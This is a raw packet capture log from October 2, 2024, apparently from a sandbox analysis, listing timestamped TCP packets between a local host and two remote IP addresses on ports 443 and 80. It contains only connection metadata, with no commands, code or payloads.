                                                              Oct 2, 2024 05:29:24.344744921 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:24.345098019 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:24.345118999 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:24.345238924 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:24.345238924 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:24.345249891 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:24.345305920 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:24.406862974 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:24.406879902 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:24.406975985 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:24.406990051 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:24.407006979 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:24.407032967 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:24.415276051 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:24.415302992 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:24.415347099 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:24.415374041 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:24.415406942 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:24.415426016 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:24.415884018 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:24.415905952 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:24.415972948 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:24.415982962 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:24.416030884 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:24.481374979 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:24.481395006 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:24.481503010 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:24.481523991 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:24.481585979 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:24.481903076 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:24.481916904 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:24.481997967 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:24.482012033 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:24.482076883 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:24.539074898 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:24.539093971 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:24.539226055 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:24.539249897 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:24.539305925 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:24.547703028 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:24.547719002 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:24.547801018 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:24.547822952 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:24.547890902 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:25.826405048 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:25.826411963 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:25.826455116 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:25.885837078 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:25.885857105 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:25.886126995 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:25.886148930 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:25.886208057 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:25.892261028 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:25.892277956 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:25.892378092 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:25.892393112 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:25.892465115 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:25.932157993 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:25.932174921 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:25.932286024 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:25.932307005 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:25.932444096 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:25.952385902 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:25.952414036 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:25.952493906 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:25.952507019 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:25.952578068 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:25.958832026 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:25.958838940 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:25.958929062 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:25.958929062 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:25.958940983 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:25.959009886 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:25.998521090 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:25.998544931 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:25.998788118 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:25.998805046 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:25.998862028 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.024836063 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.024854898 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.024956942 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.024971962 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.025017023 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.025207043 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.025223970 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.025260925 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.025266886 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.025312901 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.025312901 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.084849119 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.084878922 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.084976912 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.084990978 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.085076094 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.090693951 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.090714931 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.090846062 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.090862989 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.090919971 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.091217041 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.091233015 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.091317892 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.091325998 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.091366053 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.150733948 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.150753021 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.150830030 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.150844097 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.150897026 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.150897026 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.157181978 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.157197952 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.157269955 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.157279968 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.157346964 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.157671928 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.157685041 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.157723904 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.157731056 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.157803059 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.217629910 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.217650890 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.217751026 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.217770100 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.217823029 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.328957081 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.328979015 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.329034090 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.329047918 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.329063892 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.329149961 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.349323988 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.349337101 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.349550962 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.349566936 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.349685907 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.349843025 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.349855900 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.349946022 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.349946022 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.349952936 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.350001097 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.356503010 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.356518030 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.356587887 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.356599092 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.356636047 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.356661081 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.415853977 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.415870905 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.415991068 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.416002035 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.416079998 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.423029900 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.423046112 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.423106909 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.423115015 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.423130035 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.423151016 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.481825113 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.481842041 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.481905937 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.481915951 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.481977940 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.481977940 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.488615036 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.488632917 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.488684893 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.488691092 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.488746881 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.488746881 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.547872066 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.547887087 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.547946930 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.547955990 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.548012018 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.555083036 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.555098057 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.555207968 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.555212975 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.555254936 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.594264984 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.594283104 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.594405890 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.594414949 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.594464064 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.620148897 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.620173931 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.620302916 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.620313883 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.620404005 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.659837008 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.659856081 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.660079956 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.660090923 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.660164118 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.680860043 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.680875063 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.680967093 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.680974007 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.681016922 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.681016922 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.687973022 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.687988043 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.688051939 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.688059092 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.688097000 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.746963978 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.746979952 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.747118950 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.747118950 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.747129917 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.747195959 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.754125118 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.754139900 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.754215002 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.754221916 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.754316092 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.813039064 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.813055038 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.813133001 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.813143015 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.813189030 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.820483923 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.820498943 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.820621967 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.820627928 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.820705891 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.857925892 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.857961893 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.858073950 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.858079910 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.858197927 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.879179955 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.879266024 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.879311085 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.879390001 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.881843090 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.967834949 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:26.972645044 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:26.972809076 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:26.972961903 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:26.977679014 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:27.676702976 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:27.676723957 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:27.676738024 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:27.676748991 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:27.676759958 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:27.676769972 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:27.676783085 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:27.676832914 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:27.676836014 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:27.676847935 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:27.676866055 CEST804970745.90.89.123192.168.2.10
Timestamp                            Source Port  Dest Port  Source IP      Dest IP
Oct 2, 2024 05:29:27.676903963 CEST  49707        80         192.168.2.10   45.90.89.123
Oct 2, 2024 05:29:27.676966906 CEST  49707        80         192.168.2.10   45.90.89.123
Oct 2, 2024 05:29:27.681711912 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:27.681724072 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:27.681736946 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:27.681813002 CEST  49707        80         192.168.2.10   45.90.89.123
Oct 2, 2024 05:29:27.723218918 CEST  49707        80         192.168.2.10   45.90.89.123
Oct 2, 2024 05:29:27.805809021 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:27.805840969 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:27.805860996 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:27.805973053 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:27.806060076 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:27.806071043 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:27.806085110 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:27.806096077 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:27.806142092 CEST  49707        80         192.168.2.10   45.90.89.123
Oct 2, 2024 05:29:27.806142092 CEST  49707        80         192.168.2.10   45.90.89.123
Oct 2, 2024 05:29:27.806142092 CEST  49707        80         192.168.2.10   45.90.89.123
Oct 2, 2024 05:29:27.806142092 CEST  49707        80         192.168.2.10   45.90.89.123
Oct 2, 2024 05:29:27.806716919 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:27.806751966 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:27.806761980 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:27.806811094 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:27.806822062 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:27.806873083 CEST  49707        80         192.168.2.10   45.90.89.123
Oct 2, 2024 05:29:27.806873083 CEST  49707        80         192.168.2.10   45.90.89.123
Oct 2, 2024 05:29:27.807590008 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:27.807609081 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:27.807621002 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:27.807686090 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:27.807697058 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:27.807774067 CEST  49707        80         192.168.2.10   45.90.89.123
Oct 2, 2024 05:29:27.807774067 CEST  49707        80         192.168.2.10   45.90.89.123
Oct 2, 2024 05:29:27.807774067 CEST  49707        80         192.168.2.10   45.90.89.123
Oct 2, 2024 05:29:27.808371067 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:27.808388948 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:27.808413982 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:27.808497906 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:27.808521986 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:27.808542967 CEST  49707        80         192.168.2.10   45.90.89.123
Oct 2, 2024 05:29:27.808542967 CEST  49707        80         192.168.2.10   45.90.89.123
Oct 2, 2024 05:29:27.811060905 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:27.811393023 CEST  49707        80         192.168.2.10   45.90.89.123
Oct 2, 2024 05:29:27.935204983 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:27.935226917 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:27.935239077 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:27.935250044 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:27.935262918 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:27.935267925 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:27.935323954 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:27.935364962 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:27.935375929 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:27.935405970 CEST  49707        80         192.168.2.10   45.90.89.123
Oct 2, 2024 05:29:27.935405970 CEST  49707        80         192.168.2.10   45.90.89.123
Oct 2, 2024 05:29:27.935405970 CEST  49707        80         192.168.2.10   45.90.89.123
Oct 2, 2024 05:29:27.935424089 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:27.935436010 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:27.935506105 CEST  49707        80         192.168.2.10   45.90.89.123
Oct 2, 2024 05:29:27.935760021 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:27.935770035 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:27.935781956 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:27.935849905 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:27.935859919 CEST  49707        80         192.168.2.10   45.90.89.123
Oct 2, 2024 05:29:27.935859919 CEST  49707        80         192.168.2.10   45.90.89.123
Oct 2, 2024 05:29:27.935861111 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:27.935872078 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:27.936103106 CEST  49707        80         192.168.2.10   45.90.89.123
Oct 2, 2024 05:29:27.936244965 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:27.936255932 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:27.936266899 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:27.936301947 CEST  49707        80         192.168.2.10   45.90.89.123
Oct 2, 2024 05:29:27.936346054 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:27.936351061 CEST  49707        80         192.168.2.10   45.90.89.123
Oct 2, 2024 05:29:27.936357975 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:27.936369896 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:27.936381102 CEST  80           49707      45.90.89.123   192.168.2.10
Oct 2, 2024 05:29:27.936541080 CEST  49707        80         192.168.2.10   45.90.89.123
Oct 2, 2024 05:29:27.936541080 CEST  49707        80         192.168.2.10   45.90.89.123
